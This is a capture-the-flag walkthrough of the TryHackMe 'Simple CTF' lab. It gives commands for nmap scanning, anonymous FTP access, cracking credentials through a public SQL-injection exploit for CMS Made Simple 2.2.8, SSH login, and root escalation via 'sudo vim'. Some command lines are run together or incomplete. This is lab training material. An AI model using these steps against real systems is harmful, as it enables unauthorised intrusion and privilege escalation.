TryHackMe: Simple CTF

3 min readJun 18, 2020
  1. Port scan
nmap -Pn <ip>

2. Scan for services and OS detection

nmap -A -p 21,80,2222 <ip>

There’re 3 services:
- 21 vsftpd 3.0.3 w/ anonymous login
- 80 Apache httpd 2.4.18 w/ robots.txt file
- 2222 OpenSSH 7.2p2

OS: Ubuntu

3. Vulnerable scan

nmap --script vuln -p 21,80,2222 <ip>

/robots.txt again

4. Access FTP w/ anonymous login

ftp <ip>anonymous
lscd pub
get ForMitch.txtexit

Read ForMitch.txt

cat ForMitch.txt

Seems like this “mitch” person has the same password everywhere and easily cracked.

5. Access HTTP site


Nothing much useful.

Access robots.txt


Access openemr path



Let’s find directory with dirb

dirb http://<ip>

Access /simple/


It’s cmsms or cms made simple.

version 2.2.8

Search for exploits

searchsploit cms made simple 2.2.8

Copy the script

searchsploit -m 46635

Review the script for usage. Seems like I can do sql injection and crack for credentials.

Run the script

python -u http://<ip>/simple/ --crack -w rockyou.txt

Try to login to CMS



Let’s try with mitch:secret

6. Access SSH. Since “mitch” uses same credential everywhere, It’s worth a try.

ssh mitch@<ip> -p 2222
ls cat user.txt

7. Privilege escalation

Check if I can run sudo

sudo -l

I can run with vim

Command reference:

sudo vim -c ':!/bin/sh'

Now I’m root

cd /rootlscat root.txt